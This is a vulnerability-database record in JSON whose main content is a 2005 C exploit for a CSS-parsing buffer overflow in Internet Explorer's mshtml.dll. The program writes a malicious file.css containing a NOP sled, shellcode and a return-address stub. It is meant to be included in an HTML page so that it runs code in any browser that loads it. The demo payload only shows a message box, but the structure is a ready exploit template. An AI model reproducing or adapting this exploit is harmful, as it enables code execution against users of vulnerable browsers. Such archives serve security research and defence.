Description
No description provided by source.
{"href": "https://www.seebug.org/vuldb/ssvid-63033", "status": "poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "MS Internet Explorer \"mshtml.dll\" CSS Parsing Buffer Overflow", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-63033", "cvelist": [], "description": "No description provided by source.", "viewCount": 5, "published": "2014-07-01T00:00:00", "sourceData": "\n /* \r\nTaken from http://www.securiteam.com/exploits/5NP042KF5A.html \r\n\r\nThe exploit will create a .CSS file that should be included \r\nin an HTML file. When a user loads the HTML file, Internet \r\nExplorer will try to parse the CSS and will trigger the \r\nbuffer overflow. \r\n*/\r\n\r\n//Exploit Code:\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <tchar.h>\r\n\r\nchar bug[]=\r\n"\\x40\\x63\\x73\\x73\\x20\\x6D\\x6D\\x7B\\x49\\x7B\\x63\\x6F\\x6E\\x74\\x65\\x6E\\x74\\x3A\\x20\\x22\\x22\\x3B\\x2F"\r\n"\\x2A\\x22\\x20\\x22\\x2A\\x2F\\x7D\\x7D\\x40\\x6D\\x3B\\x40\\x65\\x6E\\x64\\x3B\\x20\\x2F\\x2A\\x22\\x7D\\x7D\\x20\\x20\\x20";\r\n\r\n//////////////////////////////////////////////////////\r\n/*\r\nshellcode :MessageBox (0,"hack ie6",0,MB_OK);\r\n-\r\nXOR EBX,EBX\r\nPUSH EBX ; 0\r\nPUSH EBX ; 0\r\nADD AL,0F\r\nPUSH EAX ; Msg " Hack ie6 "\r\nPUSH EBX ;0\r\nJMP 746D8E72 ;USER32.MessageBoxA\r\n*/\r\n\r\nchar shellcode[]= "\\x33\\xDB\\x53\\x53\\x04\\x0F\\x50\\x53\\xE9\\xCB\\x8D\\x6D\\x74"\r\n"\\x90\\x90\\x48\\x61\\x63\\x6B\\x20\\x69\\x65\\x36\\x20\\x63\\x73\\x73";\r\n\r\n\r\n////////////////////////////////////////////////////////\r\n// return address :: esp+1AC :: start shellcode\r\n//MOV EAX,ESP\r\n//ADD AX,1AC\r\n//CALL EAX\r\n\r\nchar ret[]= "\\x8B\\xC4\\x66\\x05\\xAC\\x01\\xFF\\xD0";\r\n\r\nint main(int argc, char* argv[])\r\n{\r\n\r\n char buf[8192];\r\n FILE *cssfile;\r\n int i;\r\n\r\n printf("\\n\\n Internet Explorer(mshtml.dll) , Cascading Style Sheets Exploit \\n");\r\n printf(" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n");\r\n printf(" Coded by : Arabteam2000 \\n");\r\n printf(" Web: www.arabteam2000.com \\n");\r\n printf(" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n\\n");\r\n\r\n // NOP`s\r\n for(i=0;i<8192;i++)\r\n buf[i]=0x90;\r\n\r\n\r\n // bug\r\n memcpy((void*)&buf[0],\r\n (void*)&bug,48);\r\n\r\n // shellcode\r\n memcpy((void*)&buf[100],\r\n (void*)&shellcode,27);\r\n\r\n // ret address\r\n memcpy((void*)&buf[8182],\r\n (void*)&ret,8);\r\n\r\n\r\n cssfile=fopen("file.css","w+b");\r\n if(cssfile==NULL){\r\n printf("-Error: fopen \\n");\r\n return 1;\r\n }\r\n\r\n fwrite(buf,8192,1,cssfile);\r\n printf("-Created file: file.css\\n ..OK\\n\\n");\r\n\r\n fclose (cssfile);\r\n return 0;\r\n}\n\n// milw0rm.com [2005-03-09]\n\n ", "id": "SSV:63033", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T14:15:23", "reporter": "Root", "enchantments": {"score": {"value": 7.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 7.1}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645314319, "score": 1683883310, "epss": 1678848988}, "_internal": {"score_hash": "91fb7fe26d18ab381faf637e973ff65f"}}
{}